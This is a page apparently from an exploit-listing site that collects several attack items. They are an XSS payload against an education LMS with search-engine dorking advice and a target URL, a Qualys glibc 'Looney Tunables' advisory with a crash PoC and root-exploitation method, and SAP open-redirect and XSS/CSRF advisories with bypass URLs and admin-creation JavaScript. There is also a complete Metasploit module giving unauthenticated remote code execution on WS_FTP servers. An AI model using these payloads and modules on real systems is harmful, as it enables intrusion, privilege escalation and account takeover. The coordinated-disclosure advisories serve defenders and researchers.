Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : Aicte india LMS 3.0 XSS Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 69.0(32-bit) | | # Vendor : https://www.facebook.com/OfficialAICTE/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] use payload : /committee.php?n=ANTI-RAGGING'"()%26%25<acx><ScRiPt >prompt(926233)</ScRiPt> [+] http://vtcbcsreduin/committee.php?n=ANTI-RAGGING%27%22()%26%25%3Cacx%3E%3CScRiPt%20%3Eprompt(926233)%3C/ScRiPt%3E Greetings to :================================================================= jericho * Larry W. Cashdollar * shadow_00715 * LiquidWorm * Hussin-X * D4NB4R | =============================================================================== </code></pre>

<pre><code> Qualys Security Advisory Looney Tunables: Local Privilege Escalation in the glibc's ld.so (CVE-2023-4911) ======================================================================== Contents ======================================================================== Summary Analysis Proof of concept Exploitation Acknowledgments Timeline ======================================================================== Summary ======================================================================== The GNU C Library's dynamic loader "find[s] and load[s] the shared objects (shared libraries) needed by a program, prepare[s] the program to run, and then run[s] it" (man ld.so). The dynamic loader is extremely security sensitive, because its code runs with elevated privileges when a local user executes a set-user-ID program, a set-group-ID program, or a program with capabilities. Historically, the processing of environment variables such as LD_PRELOAD, LD_AUDIT, and LD_LIBRARY_PATH has been a fertile source of vulnerabilities in the dynamic loader. Recently, we discovered a vulnerability (a buffer overflow) in the dynamic loader's processing of the GLIBC_TUNABLES environment variable (https://www.gnu.org/software/libc/manual/html_node/Tunables.html). This vulnerability was introduced in April 2021 (glibc 2.34) by commit 2ed18c ("Fix SXID_ERASE behavior in setuid programs (BZ #27471)"). We successfully exploited this vulnerability and obtained full root privileges on the default installations of Fedora 37 and 38, Ubuntu 22.04 and 23.04, Debian 12 and 13; other distributions are probably also vulnerable and exploitable (one notable exception is Alpine Linux, which uses musl libc, not the glibc). We will not publish our exploit for now; however, this buffer overflow is easily exploitable (by transforming it into a data-only attack), and other researchers might publish working exploits shortly after this coordinated disclosure. ======================================================================== Analysis ======================================================================== At the very beginning of its execution, ld.so calls __tunables_init() to walk through the environment (at line 279), searching for GLIBC_TUNABLES variables (at line 282); for each GLIBC_TUNABLES that it finds, it makes a copy of this variable (at line 284), calls parse_tunables() to process and sanitize this copy (at line 286), and finally replaces the original GLIBC_TUNABLES with this sanitized copy (at line 288): ------------------------------------------------------------------------ 269 void 270 __tunables_init (char **envp) 271 { 272 char *envname = NULL; 273 char *envval = NULL; 274 size_t len = 0; 275 char **prev_envp = envp; ... 279 while ((envp = get_next_env (envp, &envname, &len, &envval, 280 &prev_envp)) != NULL) 281 { 282 if (tunable_is_name ("GLIBC_TUNABLES", envname)) 283 { 284 char *new_env = tunables_strdup (envname); 285 if (new_env != NULL) 286 parse_tunables (new_env + len + 1, envval); 287 /* Put in the updated envval. */ 288 *prev_envp = new_env; 289 continue; 290 } ------------------------------------------------------------------------ The first argument of parse_tunables() (tunestr) points to the soon-to-be-sanitized copy of GLIBC_TUNABLES, while the second argument (valstring) points to the original GLIBC_TUNABLES environment variable (in the stack). To sanitize the copy of GLIBC_TUNABLES (which should be of the form "tunable1=aaa:tunable2=bbb"), parse_tunables() removes all dangerous tunables (the SXID_ERASE tunables) from tunestr, but keeps SXID_IGNORE and NONE tunables (at lines 221-235): ------------------------------------------------------------------------ 162 static void 163 parse_tunables (char *tunestr, char *valstring) 164 { ... 168 char *p = tunestr; 169 size_t off = 0; 170 171 while (true) 172 { 173 char *name = p; 174 size_t len = 0; 175 176 /* First, find where the name ends. */ 177 while (p[len] != '=' && p[len] != ':' && p[len] != '\0') 178 len++; 179 180 /* If we reach the end of the string before getting a valid name-value 181 pair, bail out. */ 182 if (p[len] == '\0') 183 { 184 if (__libc_enable_secure) 185 tunestr[off] = '\0'; 186 return; 187 } 188 189 /* We did not find a valid name-value pair before encountering the 190 colon. */ 191 if (p[len]== ':') 192 { 193 p += len + 1; 194 continue; 195 } 196 197 p += len + 1; 198 199 /* Take the value from the valstring since we need to NULL terminate it. */ 200 char *value = &valstring[p - tunestr]; 201 len = 0; 202 203 while (p[len] != ':' && p[len] != '\0') 204 len++; 205 206 /* Add the tunable if it exists. */ 207 for (size_t i = 0; i < sizeof (tunable_list) / sizeof (tunable_t); i++) 208 { 209 tunable_t *cur = &tunable_list[i]; 210 211 if (tunable_is_name (cur->name, name)) 212 { ... 219 if (__libc_enable_secure) 220 { 221 if (cur->security_level != TUNABLE_SECLEVEL_SXID_ERASE) 222 { 223 if (off > 0) 224 tunestr[off++] = ':'; 225 226 const char *n = cur->name; 227 228 while (*n != '\0') 229 tunestr[off++] = *n++; 230 231 tunestr[off++] = '='; 232 233 for (size_t j = 0; j < len; j++) 234 tunestr[off++] = value[j]; 235 } 236 237 if (cur->security_level != TUNABLE_SECLEVEL_NONE) 238 break; 239 } 240 241 value[len] = '\0'; 242 tunable_initialize (cur, value); 243 break; 244 } 245 } 246 247 if (p[len] != '\0') 248 p += len + 1; 249 } 250 } ------------------------------------------------------------------------ Unfortunately, if a GLIBC_TUNABLES environment variable is of the form "tunable1=tunable2=AAA" (where "tunable1" and "tunable2" are SXID_IGNORE tunables, for example "glibc.malloc.mxfast"), then: - during the first iteration of the "while (true)" in parse_tunables(), the entire "tunable1=tunable2=AAA" is copied in-place to tunestr (at lines 221-235), thus filling up tunestr; - at lines 247-248, p is not incremented (p[len] is '\0' because no ':' was found at lines 203-204) and therefore p still points to the value of "tunable1", i.e. "tunable2=AAA"; - during the second iteration of the "while (true)" in parse_tunables(), "tunable2=AAA" is appended (as if it were a second tunable) to tunestr (which is already full), thus overflowing tunestr. A note on fuzzing: although we discovered this buffer overflow manually, we later tried to fuzz the vulnerable function, parse_tunables(); both AFL++ and libFuzzer re-discovered this overflow in less than a second, when provided with a dictionary of tunables (which can be compiled by running "ld.so --list-tunables"). ======================================================================== Proof of concept ======================================================================== $ env -i "GLIBC_TUNABLES=glibc.malloc.mxfast=glibc.malloc.mxfast=A" "Z=`printf '%08192x' 1`" /usr/bin/su --help Segmentation fault (core dumped) ======================================================================== Exploitation ======================================================================== This vulnerability is a straightforward buffer overflow, but what should we overwrite to achieve arbitrary code execution? The buffer we overflow is allocated at line 284 by tunables_strdup(), a re-implementation of strdup() that uses ld.so's __minimal_malloc() instead of the glibc's malloc() (indeed, the glibc's malloc() has not been initialized yet). This __minimal_malloc() implementation simply calls mmap() to obtain more memory from the kernel. The question, then, is: what writable pages can we overwrite in the mmap region? To the best of our knowledge, we have only two options (because this buffer overflow takes place at the very beginning of ld.so's execution): 1/ The read-write ELF segment of ld.so itself (the first pages of this read-write segment are actually ld.so's RELRO segment, but they have not been mprotect()ed read-only yet): ------------------------------------------------------------------------ 7f209f367000-7f209f369000 r--p 00000000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 7f209f369000-7f209f393000 r-xp 00002000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 7f209f393000-7f209f39e000 r--p 0002c000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 7f209f39f000-7f209f3a3000 rw-p 00037000 fd:00 10943 /usr/lib/x86_64-linux-gnu/ld-linux-x86-64.so.2 ------------------------------------------------------------------------ However, on all the Linux distributions that we checked, the unmapped hole immediately below ld.so's read-write segment is at most one page, but ld.so's __minimal_malloc() always allocates at least two pages ("one extra page to reduce number of mmap calls"). In other words, the buffer we overflow cannot be allocated immediately below ld.so's read-write segment, and therefore cannot overwrite this segment. 2/ Our only option, then, is to overwrite mmap()ed pages that were allocated by tunables_strdup() itself: because __tunables_init() can process multiple GLIBC_TUNABLES environment variables, and because the Linux kernel's mmap() is a top-down allocator, we can mmap() a first GLIBC_TUNABLES (without overflowing it), mmap() a second GLIBC_TUNABLES (immediately below the first one) and overflow it, thus overwriting the first GLIBC_TUNABLES. As a result, we can: - either replace this first GLIBC_TUNABLES with a completely different environment variable, for example LD_PRELOAD or LD_LIBRARY_PATH -- but these dangerous variables are later removed from the environment by ld.so (in process_envvars()), and such a replacement would therefore be useless; - or replace the first GLIBC_TUNABLES with a GLIBC_TUNABLES that contains dangerous (SXID_ERASE) tunables, which were previously removed by parse_tunables() -- although this seems promising at first, exploiting such a replacement would require a SUID-root program that setuid(0)s and execve()s another program with a preserved environment (to process the dangerous GLIBC_TUNABLES as root, but without __libc_enable_secure). Alas, we do not know of such a SUID-root program on Linux (on OpenBSD, /usr/bin/chpass setuid(0)s and execv()s /usr/sbin/pwd_mkdb, and was exploited in CVE-2019-19726); if you, dear reader, know of such a SUID-root program on Linux, please let us know! At that point, the situation looked quite hopeless, but a comment in ld.so's _dl_new_object() (which is called long after __tunables_init()) caught our attention (at line 105): ------------------------------------------------------------------------ 56 struct link_map * 57 _dl_new_object (char *realname, const char *libname, int type, 58 struct link_map *loader, int mode, Lmid_t nsid) 59 { .. 84 struct link_map *new; 85 struct libname_list *newname; .. 92 new = (struct link_map *) calloc (sizeof (*new) + audit_space 93 + sizeof (struct link_map *) 94 + sizeof (*newname) + libname_len, 1); 95 if (new == NULL) 96 return NULL; 97 98 new->l_real = new; 99 new->l_symbolic_searchlist.r_list = (struct link_map **) ((char *) (new + 1) 100 + audit_space); 101 102 new->l_libname = newname 103 = (struct libname_list *) (new->l_symbolic_searchlist.r_list + 1); 104 newname->name = (char *) memcpy (newname + 1, libname, libname_len); 105 /* newname->next = NULL; We use calloc therefore not necessary. */ ------------------------------------------------------------------------ ld.so allocates the memory for this link_map structure with calloc(), and therefore does not explicitly initialize various of its members to zero; this is a reasonable optimization. As mentioned earlier, calloc() here is not the glibc's calloc() but ld.so's __minimal_calloc(), which calls __minimal_malloc() *without* explicitly initializing the memory it returns to zero; this is also a reasonable optimization, because for all intents and purposes __minimal_malloc() always returns a clean chunk of mmap()ed memory, which is guaranteed to be initialized to zero by the kernel. Unfortunately, the buffer overflow in parse_tunables() allows us to overwrite clean mmap()ed memory with non-zero bytes, thereby overwriting pointers of the soon-to-be-allocated link_map structure with non-NULL values. This allows us to completely break the logic of ld.so, which assumes that these pointers are NULL. We first tried to exploit this buffer overflow by overwriting the link_map structure's l_next and l_prev pointers (a doubly linked list of link_map structures), but we failed because of two assert()ion failures in setup_vdso(), which immediately abort() ld.so (all the distributions that we checked compile their glibc, and hence ld.so, with assert()ions enabled): ------------------------------------------------------------------------ 96 assert (l->l_next == NULL); 97 assert (l->l_prev == main_map); ------------------------------------------------------------------------ We then realized that many more pointers in the link_map structure are not explicitly initialized to NULL; in particular, the pointers to Elf64_Dyn structures in the l_info[] array of pointers. Among these, l_info[DT_RPATH], the "Library search path", immediately stood out: if we overwrite this pointer and control where and what it points to, then we can force ld.so to trust a directory that we own, and therefore to load our own libc.so.6 or LD_PRELOAD library from this directory, and execute arbitrary code (as root, if we run ld.so through a SUID-root program). ------------------------------------------------------------------------ Where should the overwritten l_info[DT_RPATH] point to? The easy answer to this question is: the stack; more precisely, our environment strings in the stack. On Linux, the stack is randomized in a 16GB region, and our environment strings can occupy up to 6MB (_STK_LIM / 4 * 3, in the kernel's bprm_stack_limits()): after 16GB / 6MB = 2730 tries we have a good chance of guessing the address of our environment strings (in our exploit, we always overwrite l_info[DT_RPATH] with 0x7ffdfffff010, the center of the randomized stack region). In our tests, this brute force takes ~30s on Debian, and ~5m on Ubuntu and Fedora (because of their automatic crash handlers, Apport and ABRT; we have not tried to work around this slowdown). ------------------------------------------------------------------------ What should the overwritten l_info[DT_RPATH] point to? In other words, what should we store in our 6MB of environment strings? l_info[DT_RPATH] is a pointer to a small (16B) Elf64_Dyn structure: - an int64_t d_tag, which should be DT_RPATH (15), but this value is never actually checked anywhere, so we can store anything there; - a uint64_t d_val, which is an offset into the ELF string table of the SUID-root program that is being executed (this offset references a string that is the "Library search path" itself). In our exploit, we simply fill our 6MB of environment strings with 0xfffffffffffffff8 (-8), because at an offset of -8B below the string table of most SUID-root programs, the string "\x08" appears: this forces ld.so to trust a relative directory named "\x08" (in our current working directory), and therefore allows us to load and execute our own libc.so.6 or LD_PRELOAD library from this directory, as root. ------------------------------------------------------------------------ One major problem remains unsolved, however: to avoid the kind of assert()ion failures mentioned earlier (when we tried to overwrite the l_next and l_prev pointers of the link_map structure), we must overwrite the soon-to-be-allocated link_map structure with NULL pointers only (except l_info[DT_RPATH], of course); but intuitively, the ability to overflow a buffer with a large number of null bytes while parsing a null-terminated C string sounds quite unusual. Luckily for us attackers, the bytes that are written out-of-bounds by parse_tunables() are also read out-of-bounds (at line 234), but not from the mmap()ed copy of our GLIBC_TUNABLES environment variable (tunestr), but from our original GLIBC_TUNABLES environment variable in the stack (valstring, at line 200). Consequently, if we store a large number of empty strings (null bytes) immediately after our GLIBC_TUNABLES in the stack, followed by the string "\x10\xf0\xff\xff\xfd\x7f", followed by more empty strings (null bytes), then we safely overwrite the link_map structure with null bytes (NULL pointers), except for l_info[DT_RPATH] (which we overwrite with 0x7ffdfffff010, which points to our own Elf64_Dyn structures in the stack with a probability of 1/2730). Final note: the exploitation method described in this advisory works against almost all of the SUID-root programs that are installed by default on Linux; a few exceptions are: - sudo on all distributions, because it specifies its own ELF RUNPATH (/usr/libexec/sudo), which overrides our l_info[DT_RPATH]; - chage and passwd on Fedora, because they are protected by special SELinux rules; - snap-confine on Ubuntu, because it is protected by special AppArmor rules. Last-minute note: although glibc 2.34 is vulnerable to this buffer overflow, its tunables_strdup() uses __sbrk(), not __minimal_malloc() (which was introduced in glibc 2.35 by commit b05fae, "elf: Use the minimal malloc on tunables_strdup"); we have not yet investigated whether glibc 2.34 is exploitable or not. ======================================================================== Acknowledgments ======================================================================== We thank Red Hat Product Security, Siddhesh Poyarekar, the members of linux-distros@openwall, Salvatore Bonaccorso, and Solar Designer. ======================================================================== Timeline ======================================================================== 2023-09-04: Advisory and exploit sent to secalert@redhat. 2023-09-19: Advisory and patch sent to linux-distros@openwall. 2023-10-03: Coordinated Release Date (17:00 UTC). </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20231005-0 > ======================================================================= title: Open Redirect in BSP Test Application it00 (Bypass for CVE-2020-6215 Patch) product: SAP® Application Server ABAP and ABAP® Platform (SAP_BASIS) vulnerable version: see section "Vulnerable / tested versions" fixed version: see SAP security note 3258950 CVE number: CVE-2020-6215 impact: medium homepage: https://www.sap.com found: 2022-09-23 by: Fabian Hagg (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "SAP is one of the world’s leading producers of software for the management of business processes."[1] [1] https://www.sap.com/about/what-is-sap.html Business recommendation: ------------------------ By exploiting the vulnerability documented in this advisory, attackers can redirect users to arbitrary sites. Targeted users of such an attack may be victims of successful phishing attempts jeopardizing the confidentiality of logon information or other data. SEC Consult recommends to implement the security note 3258950, where the documented issue is fixed according to the vendor. We advise installing the correction as a matter of priority to keep business-critical data secure. Vulnerability overview/description: ----------------------------------- 1) Open Redirect Vulnerability (Patch bypass of CVE-2020-6215) The sample Business Server Pages (BSP) application it00 suffers from an open redirect vulnerability that is referred to by CVE-2020-6215 [2]. A patch for this issue was made available via SAP Security Note 2872782 [3]. During analysis, it was identified that the patch is insufficient and can be bypassed. [2] https://nvd.nist.gov/vuln/detail/CVE-2020-6215 [3] https://me.sap.com/notes/2872782 Proof of concept: ----------------- 1) Open Redirect Vulnerability (Patch bypass of CVE-2020-6215) The following source code excerpt of event handler OnInputProcessing() of BSP subpage transition_navigation.htm shows that by the implementation of SAP Security Note 2872782, an additional check was introduced that validates the HTTP request parameter ‘applicationUrl’ against pseudo-headers ~server_name, respectively ~server_name_expanded. Thus, to verify that the provided URL complies with these values to only allow redirects to the local server, the IF condition checks if the specified ‘applicationUrl’ parameter contains the host name of the local server. Only if this check is evaluated successfully, the browser of the calling user gets redirected to the intended page. --------------------------------------------------------------------------- [...] when 'call'. data: url1 type string, url2 type string, host_name type string. host_name = request->get_header_field( '~server_name' ). if host_name is initial. host_name = request->get_header_field( '~server_name_expanded' ). endif. url = request->get_form_field( 'applicationUrl' ). if url cs host_name. split url at '?' into url1 url2. url2 = cl_abap_dyn_prg=>escape_xss_url( url2 ). concatenate url1 '?' url2 into url. navigation->call_application( url = url ). endif. * negative test cases when 'error_no_such_exit'. navigation->next_page( 'NAVFAIL' ). endcase. --------------------------------------------------------------------------- It was observed that this check can be bypassed, for example, by crafting special HTTP requests that contain the host name of the target application server (the PoC uses the <app server hostname> placeholder) within the query string part of the URL provided via parameter ‘applicationUrl’. To validate this issue, the following URL can be browsed to in order to trigger the vulnerability and circumvent the implemented patch. --------------------------------------------------------------------------- http[s]://<app server hostname>:<ICM port>/sap/bc/bsp/sap/it00/transition_ navigation.htm?ApplicationURL=http://127.0.0.1:8080/?<app server hostname> &onInputProcessing%28call%29=Start+Application --------------------------------------------------------------------------- For demonstration purposes, after a successful login, the browser is redirected by the application server to localhost on port 8080 (any other host/port pair could by specified by the attacker). The server replies with a "302 Found" message redirecting the browser to the localhost address defined in the response Location header field: --------------------------------------------------------------------------- HTTP/2 302 Found Content-Type: text/html Content-Length: 0 Location: http://127.0.0.1:8080/?<app server hostname>&sap-params=[...] --------------------------------------------------------------------------- An attacker can create a URL which would redirect the victim to a malicious site, for example, a phishing site convincing the victim to login once again. Vulnerable / tested versions: ----------------------------- The following version has been tested and found to be vulnerable: - SAP_BASIS release 755, SP level 01 According to the vendor the following releases and versions are affected by the discovered vulnerability: - SAP_BASIS 700-702 - SAP_BASIS 731 - SAP_BASIS 740 - SAP_BASIS 750-757 Vendor contact timeline: ------------------------ 2022-10-03: Contacting vendor through vulnerability submission web form. 2022-10-04: Vendor confirms receipt and assigns internal ID #2270141902. 2022-10-19: Vendor confirms vulnerability and proposes new CVSS score of 5.4 (NLNR|U|LLN). 2022-10-24: Asking vendor why new CVSS rating differs from initial vulnerability rating. No response. 2022-11-24: Asking vendor for update. 2022-11-30: Vendor states that the patch is about to be released with the upcoming Patch Tuesday December 2022. 2022-12-13: Vendor releases patch with SAP Security Note 3258950. 2023-10-05: Release of security advisory. Solution: --------- The vendor provides a patched version which should be installed immediately. Patches are available in form of SAP Security Notes which can be accessed via the SAP Customer Launchpad [4]. More information can also be found in the Official SAP Security Patchday Blog [5]. The following Security Note needs to be implemented: 3258950 [4] https://me.sap.com/app/securitynotes [5] https://dam.sap.com/mac/app/e/pdf/preview/embed/ucQrx6G?ltr=a&rc=10 Workaround: ----------- Disable BSP test application it00 in the ICF service tree in transaction SICF. Advisory URL: ------------- https://sec-consult.com/vulnerability-lab/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ SEC Consult Vulnerability Lab SEC Consult, an Eviden business Europe | Asia About SEC Consult Vulnerability Lab The SEC Consult Vulnerability Lab is an integrated part of SEC Consult, an Atos company. It ensures the continued knowledge gain of SEC Consult in the field of network and application security to stay ahead of the attacker. The SEC Consult Vulnerability Lab supports high-quality penetration testing and the evaluation of new offensive and defensive technologies for our customers. Hence our customers obtain the most current information about vulnerabilities and valid recommendation about the risk profile of new technologies. ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Interested to work with the experts of SEC Consult? Send us your application https://sec-consult.com/career/ Interested in improving your cyber security with the experts of SEC Consult? Contact our local offices https://sec-consult.com/contact/ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Mail: security-research at sec-consult dot com Web: https://www.sec-consult.com Blog: https://blog.sec-consult.com Twitter: https://twitter.com/sec_consult EOF F. Hagg / @2023 </code></pre>

<pre><code>## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::HttpClient prepend Msf::Exploit::Remote::AutoCheck def initialize(info = {}) super( update_info( info, 'Name' => 'Progress Software WS_FTP Unauthenticated Remote Code Execution', 'Description' => %q{ This module exploits an unsafe .NET deserialization vulnerability to achieve unauthenticated remote code execution against a vulnerable WS_FTP server running the Ad Hoc Transfer module. All versions of WS_FTP Server prior to 2020.0.4 (version 8.7.4) and 2022.0.2 (version 8.8.2) are vulnerable to this issue. The vulnerability was originally discovered by AssetNote. }, 'License' => MSF_LICENSE, 'Author' => [ 'sfewer-r7', # MSF Exploit & Rapid7 Analysis ], 'References' => [ ['CVE', '2023-40044'], ['URL', 'https://attackerkb.com/topics/bn32f9sNax/cve-2023-40044/rapid7-analysis'], ['URL', 'https://community.progress.com/s/article/WS-FTP-Server-Critical-Vulnerability-September-2023'], ['URL', 'https://www.assetnote.io/resources/research/rce-in-progress-ws-ftp-ad-hoc-via-iis-http-modules-cve-2023-40044'] ], 'DisclosureDate' => '2023-09-27', 'Platform' => %w[win], 'Arch' => [ARCH_CMD], # 5000 will allow the powershell payloads to work as they require ~4200 bytes. Notably, the ClaimsPrincipal and # TypeConfuseDelegate (but not TextFormattingRunProperties) gadget chains will fail if Space is too large (e.g. # 8192 bytes), as the encoded payload command is padded with leading whitespace characters (0x20) to consume # all the available payload space via ./modules/nops/cmd/generic.rb). 'Payload' => { 'Space' => 5000 }, 'Privileged' => false, # Code execution as `NT AUTHORITY\NETWORK SERVICE`. 'Targets' => [ [ 'Windows', {} ] ], 'DefaultOptions' => { 'RPORT' => 443, 'SSL' => true }, 'DefaultTarget' => 0, 'Notes' => { 'Stability' => [CRASH_SAFE], 'Reliability' => [REPEATABLE_SESSION], 'SideEffects' => [IOC_IN_LOGS] } ) ) register_options( [ # This URI path can be anything so long as it begins with /AHT/. We default ot /AHT/ as it is less obvious in # the IIS logs as to what the request is for, however the user can change this as needed if required. Msf::OptString.new('TARGET_URI', [ false, 'Target URI used to exploit the deserialization vulnerability. Must begin with /AHT/', '/AHT/']), ] ) end def check # As the vulnerability lies in the WS_FTP Ad Hoc Transfer (AHT) module, we query the index HTML file for AHT. res = send_request_cgi( 'method' => 'GET', 'uri' => '/AHT/AHT_UI/public/index.html' ) return CheckCode::Unknown('Connection failed') unless res title = Nokogiri::HTML(res.body).xpath('//head/title')&.text # We verify the target is running the AHT module, by inspecting the HTML heads title. if title == 'Ad Hoc Transfer' res = send_request_cgi( 'method' => 'GET', 'uri' => '/AHT/AHT_UI/public/js/app.min.js' ) return CheckCode::Unknown('Connection failed') unless res # The patched versions were released on September 2023. We can query the date stamp in the app.min.js file # to see when this file was built. If it is before Sept 2023, then we have a vulnerable version of WS_FTP, # but if it was build on Sept 2023 or after, it is not vulnerable. if res.code == 200 && res.body =~ %r{/\*! fileTransfer (\d+)-(\d+)-(\d+) \*/} day = ::Regexp.last_match(1).to_i month = ::Regexp.last_match(2).to_i year = ::Regexp.last_match(3).to_i description = "Detected a build date of #{day}-#{month}-#{year}" if year > 2023 || (year == 2023 && month >= 9) return CheckCode::Safe(description) end return CheckCode::Appears(description) end # If we couldn't get the JS build date, we at least know the target is WS_FTP with the Ad Hoc Transfer module. return CheckCode::Detected end CheckCode::Unknown end def exploit unless datastore['TARGET_URI'].start_with? '/AHT/' fail_with(Failure::BadConfig, 'The TARGET_URI must begin with /AHT/') end # All of these gadget chains will work. We pick a random one during exploitation. chains = %i[ClaimsPrincipal TypeConfuseDelegate TextFormattingRunProperties] gadget = ::Msf::Util::DotNetDeserialization.generate( payload.encoded, gadget_chain: chains.sample, formatter: :BinaryFormatter ) # We can reach the unsafe deserialization via either of these tags. We pick a random one during exploitation. tags = %w[AHT_DEFAULT_UPLOAD_PARAMETER AHT_UPLOAD_PARAMETER] message = Rex::MIME::Message.new part = message.add_part("::#{tags.sample}::#{Rex::Text.encode_base64(gadget)}\r\n", nil, nil, nil) part.header.set('name', rand_text_alphanumeric(8)) res = send_request_cgi( { 'uri' => normalize_uri(datastore['TARGET_URI']), 'ctype' => 'multipart/form-data; boundary=' + message.bound, 'method' => 'POST', 'data' => message.to_s } ) unless res&.code == 302 fail_with(Failure::UnexpectedReply, 'Failed to trigger vulnerability') end end end </code></pre>

<pre><code>SEC Consult Vulnerability Lab Security Advisory < 20230927-0 > ======================================================================= title: Multiple Vulnerabilities product: SAP® Enable Now Manager vulnerable version: 10.6.5 (Build 2804) Cloud Edition fixed version: May 2023 Release CVE number: N/A (cloud) impact: high homepage: https://www.sap.com/about.html found: 2022-10-21 by: Paul Serban (Eviden) Fabian Hagg (Office Vienna) SEC Consult Vulnerability Lab An integrated part of SEC Consult, an Eviden business Europe | Asia https://www.sec-consult.com ======================================================================= Vendor description: ------------------- "SAP Enable Now solution provides advanced in-application help and training capabilities helping you to improve productivity and user adoption, as well as to increase satisfaction of the end-user experience. Create, maintain, and deliver in-application help, learning materials, and documentation content easily." Source: https://www.sapstore.com/solutions/41243/SAP-Enable-Now Business recommendation: ------------------------ Due to the Cloud Edition being affected, the vendor automatically pushed a fix in the production environment in the May 2023 Release. SEC Consult recommends to perform a thorough security review conducted by security professionals to identify and resolve potential further critical security issues. Vulnerability overview/description: ----------------------------------- Multiple vulnerabilities were identified that could be chained together in order to allow a remote, unauthenticated attacker to create new administrative user accounts by tricking the victim to click on a malicious link or visit a malicious website prepared by the attacker. 1) Open Redirect/URL Redirection Vulnerability The file download feature of the application contains an unvalidated parameter value that exposes it to an open redirect vulnerability. An attacker can create a malicious URL which would redirect the victim to a malicious site, for example, a phishing site convincing the victim to login once again. 2) Reflected Cross Site Scripting (XSS) A reflected XSS vulnerability was found affecting the same parameter as used in 1). Due to insufficient input validation and output encoding, an attacker can inject arbitrary HTML or JavaScript code into the generated server response, executing it in the browser of the victim. The vulnerability, can be exploited, for example, to create new administrative user accounts in the application, thereby fully compromising the application. Any CSRF protection can be bypassed by means of this vulnerability. 3) Insufficient Cross-Site Request Forgery (CSRF) Protection No implementation of CSRF protection was detected in the application. Using this vulnerability, an attacker can issue requests in the context of administrative user sessions. This includes critical state changing actions such as user creation or role assignment. Note that in the test environment the option 'Supported Functions' was set to value 'DISABLE-CSRF-PROTECTION' in the server settings feature of the application. Certain configurations require this setting to be enabled, e.g. to allow the SEN Workflow Approver extension to submit the data on behalf of the logged-in user to the SAP Enable Now Manager. Without this parameter, the extension will only be able to read the content and workflow information) This indicates that there is an insecure feature which allows the protection mechanism to be disabled globally. It could not be clarified if this is the default setting. In any case, the function should still be enhanced to protect critical actions such as functions used in user management or role/permission management even if the mechanism is disabled by configuration. Proof of concept: ----------------- 1) Open Redirect/URL Redirection Vulnerability The public endpoint /resources/open_file.html is vulnerable to an open redirect via GET parameter 'info'. To verify this vulnerability, it is sufficient to open the following URL in a web browser. https://example.enable-now.cloud.sap/resources/open_file.html?info=https://www.sec-consult.com After browsing to the above link, the victim gets redirected to www.sec-consult.com in a new browser window opened by the embedded call of function window.open(). Note that both attacker and victim do not have to be authenticated for successful exploitation. 2) Reflected Cross-Site Scripting (XSS) The public endpoint /resources/open_file.html is affected by an XSS vulnerability in GET parameter 'info'. To verify this vulnerability, it is sufficient to open the following URL in a web browser. https://example.enable-now.cloud.sap/resources/open_file.html?info=javascript:alert(document.domain) After browsing to the above link, the domain property returns the domain name of the server it was loaded from an alert window within the browser of the victim. This proves the successful execution of the injected JavaScript code. In fact, any kind of JavaScript code could be injected by the attacker. Note that both attacker and victim do not have to be authenticated for successful exploitation. 3) Insufficient Cross-Site Request Forgery (CSRF) Protection No CSRF protection can be observed in POST requests sent between the client and server. This includes at least the functions "task creation", "user creation", "permission assignment" and "role/group assignment". Note that this vulnerability appears to only affect systems where the CSRF protection is disabled by option 'Supported Functions' set to value 'DISABLE-CSRF-PROTECTION' in the server settings. Although this setting can be reverted, it is advised to have the protection enabled for critical operations such as user creation or permission assignment at any time (also when the option is set). Several of the vulnerabilities above can be chained together by an unauthenticated attacker. Considering the types of vulnerabilities, there are multiple exploitation scenarios. In our example we will create a link that, when clicked by an administrator victim, will create a new admin account. For this attack to work, we first need to gather some information. To create an account, we need to know two important values: the OU and the UID. The OU represents the Organizational Unit unique identifier. The UID here represents the unique Group ID of our target group where we want our new user to be added. Performing a simple GET request to endpoint /self/group, both values can be obtained. The following listing shows the server response. ------------------------------------------------------------------------------------------------ HTTP/1.1 200 Cache-Control: no-cache, no-store, must-revalidate Expires: 0 Vary: Origin Set-Cookie: JSESSIONID=DD67AF<snip>ADF784; Path=/; Secure; HttpOnly; Content-Type: text/json;charset=UTF-8 Server: SAP Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 396 {"response":{"group":[{"name":"Learners","uid":"G_1C67681<snip>60E0938C4CB086", "ou":"OU_E8BC20E2<snip>8034410C", "active":true},{"name":"Master Authors","uid": "G_72568DE0<snip>85DE0845","ou":"OU_E8BC20E2<snip>8034410C ","active":true},{"name ":"Administrators","uid":"G_3B5DBB<snip>A97DE47C4EDF","ou":"OU_E8BC20E2<snip>80344 <-- UID of admin group and OU 10C ","active":true}]}} ------------------------------------------------------------------------------------------------ Finally, in order for the attack to succeed, the attacker needs the victim (logged in as administrator) to do first a request on the above endpoint, then a POST request on the endpoint /!/user to actually create the new user account with the administrator role assigned using the values taken from the previous response. These interactions can be scripted using the following ten lines of JavaScript code. ------------------------------------------------------------------------------------------------ var req1 = new XMLHttpRequest(); req1.open('GET', "https://example.enable-now.cloud.sap/self/group",false); req1.withCredentials = true; req1.send(); var obj = JSON.parse(req1.responseText).response; for (var i = 0; i< obj.group.length ;i++) {if (obj.group[i].name === 'Administrators') {var uid = obj.group[i].uid;var ou = obj.group[i].ou}}; var req2 = new XMLHttpRequest(); 